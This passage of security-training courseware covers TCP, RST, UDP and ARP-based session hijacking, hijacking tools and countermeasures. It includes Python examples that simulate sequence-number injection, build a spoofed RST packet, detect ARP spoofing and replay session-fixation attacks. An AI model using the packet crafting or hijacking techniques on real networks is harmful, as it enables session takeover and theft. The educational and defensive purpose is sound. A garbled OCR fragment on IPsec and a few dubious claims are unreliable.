2. The server receives this packet and sends a packet with the SYN + ACK flags set and an initial sequence number (ISN) for the server.
3. Bob sets the ACK flag, acknowledging the receipt of the packet, and increments the sequence number by 1.
4. The two machines have successfully established a session.

If the attacker can anticipate the next sequence number and ACK number that Bob will send, they can spoof Bob's address and start communication with the server.
TCP/IP Hijacking

In TCP/IP hijacking, an attacker intercepts an established connection between two communicating parties by using spoofed packets and then pretends to be one of those parties. In this approach, the attacker uses spoofed packets to redirect the TCP traffic to their own machine. Once this is successful, the victim's connection hangs, and the attacker is able to communicate with the host's machine on behalf of the victim. To launch a TCP/IP hijacking attack, the attacker must be able to sniff the victim's traffic, which in practice means that the victim and attacker are on the same network segment; the target server can be located anywhere. By using this technique, an attacker can easily attack systems that use one-time passwords, because the session is taken over after the victim has already authenticated. As illustrated in the below figure, TCP/IP hijacking involves the following processes.

▪ The hacker sniffs the communication between the victim and host to obtain the victim's ISN.
▪ By using this ISN, the attacker sends a spoofed packet from the victim's IP address to the host system.

Figure 11.22: TCP/IP hijacking process
TCP/IP hijacking is performed through the following steps.

▪ The attacker sniffs the victim's connection and uses the victim's IP address to send a spoofed packet with the predicted sequence number.
▪ The receiver processes the spoofed packet, advances its expected sequence number, and sends an acknowledgement to the victim's IP address.
▪ The victim machine is unaware of the spoofed packet. Therefore, it ignores the receiver machine's ACK packet, and its own sequence number count no longer matches what the receiver expects.
▪ Consequently, the receiver receives packets from the victim with an incorrect (stale) sequence number and only re-acknowledges them; the resulting flood of duplicate ACKs and retransmissions is known as an ACK storm.
▪ The attacker forces the victim's connection with the receiver machine into a desynchronized state.
▪ The attacker tracks sequence numbers and continuously spoofs packets that originate from the victim's IP address.
▪ The attacker continues to communicate with the receiver machine, while the victim's connection hangs.
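An added example (not from the courseware) that covers both the three-way handshake above and the desynchronization steps just listed: a minimal simulation of the sequence-number bookkeeping of two TCP endpoints, with the attacker injecting one segment at the predicted SEQ/ACK. The ISNs 4001 and 7000 follow the figure; the endpoint class, the payloads and the `hijack_demo` function are constructed for the example, and no packets leave the machine.

```python
from dataclasses import dataclass, field


@dataclass
class Segment:
    src: str
    seq: int
    ack: int
    flags: set
    payload: bytes = b""


@dataclass
class Endpoint:
    """The part of a TCP endpoint that matters for hijacking: snd_nxt is the
    next sequence number it will send, rcv_nxt the next one it expects."""
    name: str
    isn: int
    snd_nxt: int = 0
    rcv_nxt: int = 0
    log: list = field(default_factory=list)

    def __post_init__(self):
        self.snd_nxt = self.isn

    def send(self, payload: bytes = b"", flags=frozenset({"ACK"})) -> Segment:
        seg = Segment(self.name, self.snd_nxt, self.rcv_nxt, set(flags), payload)
        # SYN and FIN each consume one sequence number; data consumes its length.
        self.snd_nxt += len(payload) + (1 if "SYN" in flags or "FIN" in flags else 0)
        return seg

    def receive(self, seg: Segment) -> str:
        """Consume a segment only if it starts exactly at rcv_nxt; anything else
        is re-acknowledged but not consumed (the source of the ACK storm)."""
        if "SYN" in seg.flags and self.rcv_nxt == 0:
            self.rcv_nxt = seg.seq + 1
            return "syn"
        if seg.seq != self.rcv_nxt:
            self.log.append(f"{self.name}: stale seq {seg.seq}, expected {self.rcv_nxt} (dup-ACK)")
            return "rejected"
        self.rcv_nxt += len(seg.payload)
        self.log.append(f"{self.name}: accepted {seg.payload!r} from {seg.src}")
        return "accepted"


def handshake(client: Endpoint, server: Endpoint) -> None:
    syn = client.send(flags=frozenset({"SYN"}))              # 1. SYN, seq = client ISN
    server.receive(syn)
    syn_ack = server.send(flags=frozenset({"SYN", "ACK"}))   # 2. SYN+ACK, seq = server ISN
    client.receive(syn_ack)
    server.receive(client.send())                             # 3. ACK: both ESTABLISHED


def hijack_demo():
    bob = Endpoint("bob", isn=4001)
    server = Endpoint("server", isn=7000)
    handshake(bob, server)
    server.receive(bob.send(b"USER bob\r\n"))                 # legitimate traffic

    # The attacker sniffed the stream, so it knows exactly which SEQ/ACK Bob
    # will use next and spoofs a segment carrying those numbers.
    predicted_seq, predicted_ack = bob.snd_nxt, bob.rcv_nxt
    spoofed = Segment("attacker-as-bob", predicted_seq, predicted_ack, {"ACK"},
                      b"PASS hijacked\r\n")
    injected = server.receive(spoofed)                        # server takes it as Bob's

    # Bob knows nothing about the injected bytes and keeps sending from his own
    # snd_nxt, which the server now regards as stale: the connection is
    # desynchronized and Bob's side hangs.
    bobs_next = server.receive(bob.send(b"PASS secret\r\n"))
    return injected, bobs_next, server.rcv_nxt - predicted_seq


if __name__ == "__main__":
    print(hijack_demo())
```

The third value returned is how far the server's expectation has run ahead of Bob's sequence space (the length of the injected payload); every later segment from Bob is short by exactly that amount until the attacker stops.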
IP Spoofing: Source Routed Packets

Source routed packets are useful in gaining unauthorized access to a computer with the help of a trusted host's IP address. This type of hijack allows attackers to create their own acceptable packets to insert into a TCP session. First, an attacker spoofs a trusted host's IP address so that the server managing a session with the host accepts the packets from the attacker. The packets are source routed; therefore, the sender specifies the path for packets from the source to the destination IP, and the replies are returned along the same path, through a router or host the attacker controls, instead of to the real trusted host. By using this source-routing technique, attackers fool the server into believing that it is communicating with the user.

After spoofing the IP address successfully, the hijacker alters the sequence and acknowledgment numbers. Once these numbers are changed, the attacker injects forged packets into the TCP session before the client can respond. This leads to a desynchronized state because the sequence and ACK numbers are no longer synchronized. The original packets are lost, and the server receives a packet with the new ISN. These packets are source routed to a destination IP address specified by the attacker.

Current operating systems and routers drop source-routed packets by default, so this technique is mainly relevant on legacy or misconfigured networks.
RST Hijacking

RST hijacking involves injecting an authentic-looking reset (RST) packet by using a spoofed source IP address and predicting the sequence and acknowledgment numbers. The hacker can reset the victim's connection if the packet carries an accurate acknowledgment number and a sequence number that falls within the victim's receive window, because that window check is what the receiving TCP stack applies before honouring a reset. The victim believes that the source has sent the reset packet and resets the connection. RST hijacking can be performed using packet-crafting tools such as Colasoft Packet Builder and TCP/IP analysis tools such as tcpdump.
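An added example, not from the courseware: building the raw IPv4/TCP bytes of a spoofed RST/ACK segment with correct checksums (what a packet-crafting tool assembles), plus the receive-window check a victim applies before honouring it. Addresses, ports and sequence numbers are constructed; transmitting the bytes would need a raw socket and root privileges and is deliberately not part of the example.

```python
import socket
import struct

TH_RST, TH_ACK = 0x04, 0x10


def inet_checksum(data: bytes) -> int:
    """One's-complement checksum shared by the IPv4 and TCP headers (RFC 1071)."""
    if len(data) % 2:
        data += b"\0"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_rst(src_ip: str, dst_ip: str, sport: int, dport: int, seq: int, ack: int) -> bytes:
    """IPv4 header + TCP header of a RST/ACK whose source address is spoofed."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, ack,
                      5 << 4,                 # data offset: 5 words, no options
                      TH_RST | TH_ACK, 0, 0, 0)  # window, checksum (0 for now), urgent
    pseudo = struct.pack("!4s4sBBH", socket.inet_aton(src_ip), socket.inet_aton(dst_ip),
                         0, socket.IPPROTO_TCP, len(tcp))
    tcp = tcp[:16] + struct.pack("!H", inet_checksum(pseudo + tcp)) + tcp[18:]

    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0x1234, 0x4000,
                     64, socket.IPPROTO_TCP, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    ip = ip[:10] + struct.pack("!H", inet_checksum(ip)) + ip[12:]
    return ip + tcp


def parse(packet: bytes) -> dict:
    """Decode the fields a receiver examines and verify both checksums."""
    ihl = (packet[0] & 0x0F) * 4
    ip_ok = inet_checksum(packet[:ihl]) == 0
    src, dst = packet[12:16], packet[16:20]
    tcp = packet[ihl:]
    pseudo = struct.pack("!4s4sBBH", src, dst, 0, socket.IPPROTO_TCP, len(tcp))
    tcp_ok = inet_checksum(pseudo + tcp) == 0
    sport, dport, seq, ack, _, flags = struct.unpack("!HHIIBB", tcp[:14])
    return dict(src=socket.inet_ntoa(src), dst=socket.inet_ntoa(dst), sport=sport,
                dport=dport, seq=seq, ack=ack, rst=bool(flags & TH_RST),
                checksums_ok=ip_ok and tcp_ok)


def rst_accepted(rst_seq: int, rcv_nxt: int, rcv_wnd: int) -> bool:
    """RFC 793 rule: a RST is honoured only if its sequence number lies in the
    receive window [rcv_nxt, rcv_nxt + rcv_wnd), modulo 2^32. A guess outside
    the window is silently dropped, which is why the attacker needs to sniff or
    predict the numbers. Stacks implementing RFC 5961 are stricter still: only
    rst_seq == rcv_nxt resets immediately; an in-window value triggers a
    challenge ACK instead."""
    return (rst_seq - rcv_nxt) % (1 << 32) < rcv_wnd


if __name__ == "__main__":
    pkt = build_rst("10.0.0.5", "10.0.0.9", 44321, 80, seq=4012, ack=7001)
    print(parse(pkt))
```

The `checksums_ok` field is the bare minimum a receiver requires; the window test in `rst_accepted` is the real obstacle, and the RFC 5961 behaviour noted in its docstring is why blind RST injection against a modern stack is far harder than the attack description suggests.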
Blind Hijacking

In blind hijacking, an attacker can inject malicious data or commands into intercepted communications in a TCP session, even if the victim disables source routing. For this purpose, the attacker must correctly guess the next ISN of a computer attempting to establish a connection. Although the attacker can send malicious data or a command, such as a password setting to allow access from another location on the network, the attacker cannot view the response, because the replies go to the spoofed address rather than to the attacker. To be able to view the response, an MITM attack is a much better option.

Figure 11.2: Blind hijacking process

UDP Hijacking

In a network level session hijack of UDP, the attacker sends a forged server reply to a client's UDP request before the server can respond. Thus, the attacker takes control of the session. UDP has no handshake, sequence numbers, or acknowledgements, so no further packets need to be exchanged between the server and client for the forged reply to be accepted; the client simply takes the first answer that arrives. The server's genuine reply can be easily suppressed if sniffing is used. An MITM attack in UDP hijacking can minimize the task of the attacker because it can stop the server's reply from reaching the client in the first place.

Figure 11.25: Making a UDP session
MITM Attack Using Forged ICMP and ARP Spoofing

An MITM attack uses a packet sniffer to intercept communication between a client and server. The attacker changes the default gateway of the client's machine and attempts to reroute packets. The packets between the client and server are routed through the hijacker's host by using the following two techniques.

▪ Forged Internet Control Message Protocol (ICMP)

The Internet Control Message Protocol (ICMP) is an extension of IP used to send error messages. An attacker can use ICMP to send messages to fool the client and server. In this technique, ICMP packets are forged to redirect traffic between the client and host through the hijacker's host. The hacker's packets send error messages indicating problems in processing packets through the original connection, or ICMP redirect messages advertising the hijacker's host as a better gateway. This fools the server and client into routing through the hijacker's path instead.

▪ Address Resolution Protocol (ARP) Spoofing

Hosts use Address Resolution Protocol (ARP) tables to map network layer addresses (IP addresses) to hardware addresses or MAC addresses. This technique involves fooling the host by broadcasting forged ARP replies. The attacker sends forged ARP replies that update the ARP tables of the host that is broadcasting ARP requests, so that the IP address of the gateway (or of the peer) is mapped to the attacker's MAC address. This routes the traffic to the attacker's host instead of the legitimate IP address.

In both techniques, an attacker routes the packets in transit between the client and server through their machine.
Session Hijacking Tools

Attackers can use tools such as Burp Suite, OWASP ZAP, and bettercap to hijack a session between a client and server. This section discusses various tools that help perform session hijacking.

▪ Burp Suite

Source: https://portswigger.net

Burp Suite is an integrated platform for the security testing of web applications. It allows attackers to inspect and modify traffic between a browser and target application. Burp Suite contains the following key components.

o An intercepting proxy, which allows the user to inspect and modify traffic between their browser and the target application
o An application-aware spider that crawls content and functionality
o An advanced web application scanner that automates the detection of numerous types of vulnerability
o An intruder tool for performing powerful customized attacks to find and exploit unusual vulnerabilities
o A repeater tool for manipulating and resending individual requests
o A sequencer tool for testing the randomness of session tokens
o The CSRF PoC Generator function, which generates proof-of-concept cross-site request forgery (CSRF) attacks for a given request

As shown in the figure, attackers can use this tool to capture the session cookie of a victim and later use that cookie to reopen a closed session of the victim.

Figure 11.26: Screenshot of Burp Suite

The following are some additional session hijacking tools:

▪ OWASP ZAP (https://www.owasp.org)
▪ bettercap (https://www.bettercap.org)
▪ netool toolkit (https://sourceforge.net)
▪ WebSploit Framework (https://sourceforge.net)
▪ sslstrip (https://pypi.python.org)
Session Hijacking Tools for Mobile Phones

▪ DroidSheep

Source: https://droidsheep.info

The DroidSheep tool is used for session hijacking on Android devices connected to a common wireless network. It obtains the session ID of active users on the Wi-Fi network and uses it to access a website as an authorized user. A DroidSheep user can easily observe the activities of authorized users on websites. It can also hijack social accounts by obtaining the session ID.

Figure 11.27: Screenshot of DroidSheep

▪ DroidSniff

Source: https://github.com

DroidSniff is an Android app for security analysis in wireless networks that can capture Facebook, Twitter, LinkedIn, and other accounts. This tool is used for testing the security of user accounts. It identifies the poor security properties of network connections without encryption.

Figure 11.28: Screenshot of DroidSniff

▪ FaceNiff

Source: http://faceniff.ponury.net

FaceNiff is an Android app that allows a user to sniff and intercept web-session profiles over the Wi-Fi network that the user's mobile device is connected to. Although FaceNiff can hijack sessions only when the Wi-Fi network does not use the Extensible Authentication Protocol (EAP), it works on any private network, including open, Wired Equivalent Privacy (WEP), Wi-Fi Protected Access-pre-shared key (WPA-PSK), and WPA2-PSK networks.
Countermeasures

In general, session hijacking is a dangerous attack because the victim is at risk of identity theft, fraud, and loss of sensitive information. All networks using TCP/IP are vulnerable to the different types of session hijacking attacks discussed earlier. However, following best practices might protect against session hijacking attacks.

This section discusses session hijacking detection methods, session hijacking detection tools, various countermeasures to combat session hijacking attacks, and approaches causing vulnerability to session hijacking and their preventative solutions such as IP Security (IPsec).
Session Hijacking Detection Methods

Session hijacking attacks are exceptionally difficult to detect, and users often overlook them unless the attacker causes severe damage. The following are some symptoms of a session hijacking attack:

▪ A burst of network activity for some time, which decreases the system performance
▪ Busy servers resulting from requests sent by both the client and hijacker

Methods to detect session hijacking:

▪ Manual method: packet sniffing software
▪ Automatic method: intrusion detection systems (IDS) and intrusion prevention systems (IPS)

Figure 11.30: Session hijacking detection methods

▪ Manual Method

The manual method involves the use of packet sniffing software such as Wireshark and SteelCentral Packet Analyzer to monitor session hijacking attacks. The packet sniffer captures packets in transit across the network, which are then analyzed using various filtering tools.

Forced ARP Entry

A forced ARP entry involves replacing the MAC address of a compromised machine in the ARP cache of the server with a different one in order to restrict network traffic to the compromised machine. A forced ARP entry should be performed in the case of the following:

o Repeated ARP updates
o Frames sent between the client and server with different MAC addresses
o ACK storms

▪ Automatic Method

The automatic method involves the use of intrusion detection systems (IDS) and intrusion prevention systems (IPS) to monitor incoming network traffic. If a packet matches any of the attack signatures in the internal database, the IDS generates an alert, whereas the IPS blocks the traffic from entering the network.
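An added example (not from the courseware) that serves both the ARP spoofing description in the MITM section and the forced-ARP-entry symptoms listed here: an ARPwatch-style detector run over a constructed ARP capture. The record tuple layout, the addresses and the repeat threshold are assumptions of the example.

```python
from collections import defaultdict
from dataclasses import dataclass

# Constructed ARP records, as a sniffer would see them on one LAN segment:
# (timestamp_s, opcode, sender_ip, sender_mac, target_ip); opcode 1 = request, 2 = reply.
CAPTURE = [
    (0.0, 1, "10.0.0.5", "aa:aa:aa:aa:aa:05", "10.0.0.1"),   # host asks who has the gateway
    (0.1, 2, "10.0.0.1", "00:11:22:33:44:01", "10.0.0.5"),   # legitimate gateway reply
    (1.0, 1, "10.0.0.9", "aa:aa:aa:aa:aa:09", "10.0.0.1"),
    (1.1, 2, "10.0.0.1", "00:11:22:33:44:01", "10.0.0.9"),
    (5.0, 2, "10.0.0.1", "de:ad:be:ef:00:66", "10.0.0.5"),   # unsolicited: gateway IP, new MAC
    (6.0, 2, "10.0.0.1", "de:ad:be:ef:00:66", "10.0.0.5"),   # repeated to keep the cache poisoned
    (7.0, 2, "10.0.0.1", "de:ad:be:ef:00:66", "10.0.0.5"),
    (7.0, 2, "10.0.0.5", "de:ad:be:ef:00:66", "10.0.0.1"),   # other direction: full MITM
]


@dataclass
class Alert:
    kind: str
    subject: str
    detail: str


def detect_arp_spoofing(records, repeat_threshold: int = 3):
    """Flag the symptoms the forced-ARP-entry guidance lists: an IP whose MAC
    changes, replies nobody asked for, one MAC claiming several IPs, and the
    same update repeated over and over."""
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    pending = set()                      # (requester_ip, requested_ip) awaiting a reply
    reply_counts = defaultdict(int)
    alerts = []

    def learn(ts, ip, mac):
        known = ip_to_mac.get(ip)
        if known is not None and known != mac:
            alerts.append(Alert("mac_changed", ip, f"t={ts}: {known} -> {mac}"))
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
        # A router or a VM host legitimately answers for several IPs, so treat
        # this one as corroborating evidence rather than proof on its own.
        if len(mac_to_ips[mac]) > 1:
            alerts.append(Alert("one_mac_many_ips", mac, f"t={ts}: claims {sorted(mac_to_ips[mac])}"))

    for ts, opcode, sender_ip, sender_mac, target_ip in records:
        if opcode == 1:
            pending.add((sender_ip, target_ip))
            learn(ts, sender_ip, sender_mac)
            continue
        if (target_ip, sender_ip) in pending:
            pending.discard((target_ip, sender_ip))
        else:
            alerts.append(Alert("unsolicited_reply", sender_ip, f"t={ts}: {sender_mac} -> {target_ip}"))
        learn(ts, sender_ip, sender_mac)
        key = (sender_ip, sender_mac, target_ip)
        reply_counts[key] += 1
        if reply_counts[key] == repeat_threshold:
            alerts.append(Alert("repeated_update", sender_ip,
                                f"t={ts}: {repeat_threshold} identical replies to {target_ip}"))
    return alerts


if __name__ == "__main__":
    for a in detect_arp_spoofing(CAPTURE):
        print(f"{a.kind:18} {a.subject:18} {a.detail}")
```

On a real network the `mac_changed` alert for the gateway address is the one to act on first, and the response described above (a static ARP entry for the gateway on the affected hosts) is exactly what stops the poisoning from taking effect.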
Protecting against Session Hijacking

▪ Use Secure Shell (SSH) to create a secure communication channel.
▪ Ensure that data in transit are encrypted and implement the defense-in-depth mechanism.
▪ Use strings or long random numbers as session keys.
▪ Use different usernames and passwords for different accounts.
▪ Educate employees and minimize remote access.
▪ Implement a timeout to destroy sessions when expired.
▪ Avoid including the session ID in the URL or query string.
▪ Use switches rather than hubs and limit incoming connections.
▪ Ensure that client-side and server-side protection software are in the active state and up to date.
▪ Use strong authentication (such as Kerberos) or peer-to-peer virtual private networks (VPNs).
▪ Configure appropriate internal and external spoof rules on gateways.
▪ Use IDS products or ARPwatch for monitoring ARP cache poisoning.
▪ Use encrypted protocols available in the OpenSSH suite.
▪ Use firewalls and browser settings to confine cookies.
▪ Protect authentication cookies with TLS, setting the Secure attribute so that they are never sent over plain HTTP.
▪ Regularly update patches to fix TCP/IP vulnerabilities (e.g., predictable packet sequences).
▪ Use IPsec to encrypt session information.
▪ Use HTTP Public Key Pinning (HPKP) to allow users to authenticate web servers. Note that the major browsers have since removed HPKP support, so this header no longer has any effect in them.
▪ Enable browsers to verify website authenticity using network notary servers.
▪ Implement DNS-based authentication of named entities (DANE).
▪ Disable compression mechanisms of HTTP requests.
▪ Use cipher block chaining (CBC) ciphers incorporating random padding up to 255 bytes, thereby making the extraction of confidential information difficult for an attacker.
▪ Restrict cross-site request forgery (CSRF) from the client side.
▪ Upgrade web browsers to the latest versions.
▪ Use scanners such as masscan to detect any insecure configuration of HTTPS session settings on sites.
Web Development Guidelines to Prevent Session Hijacking

An attacker usually hijacks a session by exploiting the vulnerabilities in mechanisms used for session establishment. Web developers often ignore security. During the development process, web developers should consider the following guidelines to minimize/eliminate the risk of session hijacking.

▪ Create session keys with lengthy strings or random numbers so that it is difficult for an attacker to guess a valid session key.
▪ Regenerate the session ID after a successful login to prevent session fixation attacks.
▪ Encrypt the data and session key transferred between the user and web servers.
▪ Implement Transport Layer Security (TLS, the successor of the Secure Sockets Layer, SSL) to encrypt all the information in transit via the network.
▪ Make the session expire as soon as the user logs out.
▪ Prevent eavesdropping within the network.
▪ Reduce the life span of a session or cookie.
▪ Use restrictive cache directives for all the web traffic through HTTP and HTTPS, such as the "Cache-Control: no-cache, no-store" and "Pragma: no-cache" HTTP headers and/or equivalent META tags on all or (at least) sensitive web pages.
▪ Do not create sessions for unauthenticated users unless necessary.
▪ Ensure that the HttpOnly flag is set while using cookies for session IDs.
▪ Use the Secure flag to send cookies only in HTTPS requests and encrypt them before sending them across the network.
▪ Check whether all the requests received for the current session originate from the same IP address and user agent.
▪ Implement continuous device verification to identify whether the user who established the session is still in control.
▪ Implement risk-based authentication at different levels before granting access to sensitive information.
▪ Perform authentication and integrity verification between VPN endpoints.
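An added example, not from the courseware, that serves both the session donation attack described earlier in this module and the guidelines above: an in-memory session store whose two switches reproduce the vulnerable behaviour (session ID accepted from the URL, no regeneration on login) and the hardened one, with the two attack scenarios replayed against it. The class and function names, the session ID format and the cookie attributes are the example's own choices.

```python
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional


@dataclass
class Session:
    sid: str
    user: Optional[str] = None
    data: dict = field(default_factory=dict)


class SessionStore:
    """Minimal server-side session handling. accept_client_sid=True and
    rotate_on_login=False together are the bug pattern the attacks need."""

    def __init__(self, accept_client_sid: bool, rotate_on_login: bool):
        self.accept_client_sid = accept_client_sid
        self.rotate_on_login = rotate_on_login
        self.sessions: Dict[str, Session] = {}

    @staticmethod
    def new_sid() -> str:
        return secrets.token_urlsafe(32)          # 256 bits from the OS CSPRNG

    def resolve(self, cookie_sid: Optional[str], query_sid: Optional[str]) -> Session:
        """Find the session for a request. The vulnerable mode honours ?SID=...
        from the URL; the hardened mode uses only SIDs it issued itself."""
        candidate = cookie_sid or (query_sid if self.accept_client_sid else None)
        if candidate in self.sessions:
            return self.sessions[candidate]
        if candidate and self.accept_client_sid:
            self.sessions[candidate] = Session(candidate)   # vulnerable: adopt the client's SID
            return self.sessions[candidate]
        sid = self.new_sid()                                 # unknown or absent SID: issue a fresh one
        self.sessions[sid] = Session(sid)
        return self.sessions[sid]

    def login(self, session: Session, user: str) -> Session:
        if self.rotate_on_login:
            fresh = Session(self.new_sid(), user, dict(session.data))
            del self.sessions[session.sid]                   # the pre-auth SID dies here
            self.sessions[fresh.sid] = fresh
            return fresh
        session.user = user
        return session

    def logout(self, session: Session) -> None:
        self.sessions.pop(session.sid, None)                 # expire immediately on logout

    def cookie_header(self, session: Session) -> str:
        return (f"Set-Cookie: SID={session.sid}; Secure; HttpOnly; SameSite=Lax; "
                f"Path=/; Max-Age=900")


def session_donation(store: SessionStore) -> bool:
    """Replay the donation scenario; True means the attacker sees the victim's data."""
    attacker = store.resolve(None, None)                     # server issues a SID to the attacker
    attacker = store.login(attacker, "attacker")             # attacker logs in
    donated = attacker.sid                                   # sent as http://bank/?SID=<donated>
    victim = store.resolve(None, donated)                    # victim clicks, has no cookie yet
    victim.data["card"] = "4111 1111 1111 1111"              # victim fills in the payment form
    attacker_view = store.resolve(attacker.sid, None)        # attacker reloads their account page
    return attacker_view.data.get("card") == "4111 1111 1111 1111"


def session_fixation(store: SessionStore) -> bool:
    """Replay the fixation scenario; True means the attacker rides the victim's login."""
    planted = store.resolve(None, None).sid                  # attacker obtains a pre-auth SID
    victim = store.resolve(None, planted)                    # victim opens a link carrying it
    victim = store.login(victim, "victim")                   # victim authenticates
    attacker_view = store.resolve(planted, None)             # attacker presents the planted SID
    return attacker_view.user == "victim"
```

The two scenarios fail for different reasons: regenerating the ID on login defeats fixation but not donation (the attacker simply donates the post-login ID), while refusing IDs from the URL defeats both. That is why the guideline about keeping the session ID out of the URL and the guideline about regeneration are both needed.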
Web User Guidelines to Prevent Session Hijacking

▪ Ensure that the website is certified by the certifying authorities.
Session Hijacking Detection Tools

Session hijacking attacks are difficult to detect, and in most cases, attacks go unnoticed, causing severe leakage of confidential data. Tools such as packet sniffers, IDSs, and security information and event management (SIEM) can be used to detect session hijacking attacks.

▪ AlienVault USM

Source: https://www.alienvault.com

AlienVault Unified Security Management (USM) offers powerful threat detection, incident response, and compliance management across cloud, on-premises, and hybrid environments. Security professionals can use this tool for detecting session hijacking attempts and perform asset discovery, intrusion detection, security automation, SIEM and log management, endpoint detection and response, threat detection, threat intelligence, and vulnerability assessment.

Figure 11.31: Screenshot of AlienVault USM

▪ Wireshark

Source: https://www.wireshark.org

Wireshark allows users to capture and interactively browse the traffic on a network. This tool uses WinPcap (Npcap on current Windows releases; libpcap on other platforms) to capture packets. Therefore, it can only capture packets on the networks supported by that capture library. It captures live network traffic from Ethernet, IEEE 802.11, Point-to-Point Protocol/High-level Data Link Control (PPP/HDLC), Asynchronous Transfer Mode (ATM), Bluetooth, Universal Serial Bus (USB), Token Ring, Frame Relay, and Fiber Distributed Data Interface (FDDI) networks. Security professionals use Wireshark to monitor and detect session hijacking attempts.

Figure 11.32: Screenshot of Wireshark

The following are some additional session hijacking detection tools:

▪ Check Point IPS Software Blade (https://www.checkpoint.com)
▪ LogRhythm (https://logrhythm.com)
▪ SolarWinds Log & Event Manager (https://www.solarwinds.com)
▪ IBM Security Network Intrusion Prevention System (https://www.ibm.com)
Approaches Causing Vulnerability to Session Hijacking and their Preventative Solutions

Implementing encryption and signing protocols prevents attackers from hijacking sessions. The table below lists various issues and their respective solutions that, upon implementation, prevent or impede the hijacking of a valid session.

| Issue | Solution | Notes |
|---|---|---|
| | OpenSSH or SSH (Secure Shell) | It sends encrypted data and makes it difficult for an attacker to send correctly encrypted data if a session is hijacked. |
| | SSH FTP (SFTP), Applicability Statement 2 (AS2) | Implementing these protocols reduces the chance of hijacking. |
| | SSL (Secure Sockets Layer) or TLS (Transport Layer Security) | It reduces the chances of a successful hijack. |
| | IPsec | It prevents hijacking by securing IP communications. |
| Any remote connection | VPNs: PPTP, Layer 2 Tunneling Protocol (L2TP), and IPsec | Implementing encrypted connections for remote sessions prevents session hijacking. |
| Server Message Block (SMB) | SMB signing | It improves the security of the SMB protocol and reduces the chances of session hijacking. |
| Hub network | Switched network | It mitigates the risk of ARP spoofing and other session hijacking attacks. |

Table 11.1: Approaches causing vulnerability to session hijacking and their preventative solutions
Approaches to Prevent Session Hijacking

▪ HTTP Strict Transport Security (HSTS)

HTTP Strict Transport Security (HSTS) is a web security policy that protects HTTPS websites against MITM attacks. The HSTS policy helps web servers force web browsers to interact with them using HTTPS. With the HSTS policy, all insecure HTTP connections are automatically converted into HTTPS connections. This policy ensures that all the communication between a web server and web browser is encrypted and that all responses that are delivered and received originate from an authenticated server. The policy is delivered in the Strict-Transport-Security response header over HTTPS; a browser that has stored it refuses to fall back to plain HTTP for the stated period, which is what defeats downgrade tools such as sslstrip.

▪ Token Binding

When a user logs into a web application, a cookie with a session ID, called a token, is generated. The user utilizes this random token to send requests to the server and access resources. An attacker can impersonate the user and hijack the connection by capturing and reusing a valid session ID. Token binding protects client-server communication against session hijacking attacks. The client creates a public-private key pair for every connection to a remote server. When a client connects to the server, it generates a signature using its private key and sends this signature along with its public key to the server. The server verifies the signature using the client's public key. This ensures that the message was sent by an authentic client because only the client has its private key. Even if an attacker captures the signature, it is not possible for them to regenerate the signature or reuse it for another connection. For every new connection, a new pair of public and private keys is used.

▪ HTTP Public Key Pinning (HPKP)

HTTP Public Key Pinning (HPKP) is a trust on first use (TOFU) technique used in an HTTP header that allows a web client to associate a specific public key certificate with a particular server to minimize the risk of MITM attacks based on fraudulent certificates. In TLS sessions, to verify the authenticity of a server's public key, the public key is enclosed in an X.509 digital certificate, which is signed by a certification authority (CA). By compromising any CA, attackers can perform MITM attacks on various TLS sessions. HPKP protects TLS sessions from such attacks by delivering to the web client the list of public keys owned by a web server. When the client connects to the server, it verifies the certificate chain against the keys obtained using HPKP. If the server sends any unidentified public key, the client issues a warning message to the user. Because a wrong or lost pin can lock users out of a site, the major browsers have removed HPKP support; certificate transparency logs and CAA DNS records now serve the same purpose.
Approaches to Prevent MITM Attacks

Man-in-the-middle (MITM) attacks are common attacks in which the attackers can intercept the traffic between two endpoints. The victim may not realize the effect of this attack, because it is mostly passive in nature. Because the detection of MITM attacks is difficult, they can only be prevented using various measures. The following are some approaches to prevent MITM attacks:

▪ WEP/WPA Encryption

Wired Equivalent Privacy (WEP) and Wi-Fi Protected Access (WPA) are wireless protocols that are intended to protect the traffic that is sent and received by users over a wireless network. The implementation of these protocols can thwart the attempts of unwanted users to connect to the network. A weak encryption mechanism enables attackers to brute force credentials and enter the target network to perform an MITM attack. WEP itself is cryptographically broken and can be cracked in minutes, and the original WPA (TKIP) is deprecated; WPA2 or WPA3 should be used.

▪ VPN

A VPN creates a safe and encrypted tunnel over a public network to securely send and receive sensitive information. It creates a subnet by using key-based encryption for secure communication between endpoints. The implementation of a VPN in the network prevents attackers from decrypting the data flowing between the endpoints.

▪ Two-Factor Authentication

Two-factor authentication provides an extra layer of protection because it serves as a vector of authentication in addition to a user's password. Therefore, the implementation of two-factor authentication can prevent attackers from brute forcing credentials to compromise a user's account. It does not by itself stop session hijacking: once the second factor has been verified, the session token issued afterwards is what the attacker steals, so the session-handling measures above remain necessary.
IPSec
(©Pec isa
encrypting bythe
IETF
suite developed
protocol
eachIPpacket
ofa communicationsession
byauthenticating
forsecuringIPcommunications and
(©
tis deployed
networks
VPNsandforremote user
widelyto implement access through
diaLup
connection
ta private
Components
of IPsec Benefits of IPSec
Incernet
Key (KE)
Exchange
Dita authentication
origin
Protocol
‘Management
oakey
Dat ite
Ditaconieriaty (encryption)
IPSec (Cont'd)
of IPsec
‘Modes IPsecArchitecture
‘rama
mad ecuion
ny
( {5 Protea
|
“Aen―
Â¥
IPsec

Internet Protocol Security (IPsec) is a set of protocols that the Internet Engineering Task Force (IETF) developed to support the secure exchange of packets at the IP layer. It ensures interoperable cryptographically based security for IPv4 and IPv6, and it supports network-level peer authentication, data origin authentication, data integrity, data confidentiality (encryption), and replay protection. It is widely used to implement VPNs and for remote user access through dial-up connection to private networks. It supports transport and tunnel encryption modes, although sending and receiving devices must share a public key.
IPsec policies can be assigned through the Group Policy configuration of Active Directory domains, organizational units, and IPsec deployment policies at the domain, site, or organizational-unit level. The security services offered by IPsec include the following:
▪ Rejection of replayed packets (a form of partial sequence integrity)
▪ Data confidentiality (encryption)
▪ Access control
▪ Connectionless integrity
▪ Data origin authentication
▪ Data integrity
▪ Limited traffic-flow confidentiality
▪ Network-level peer authentication
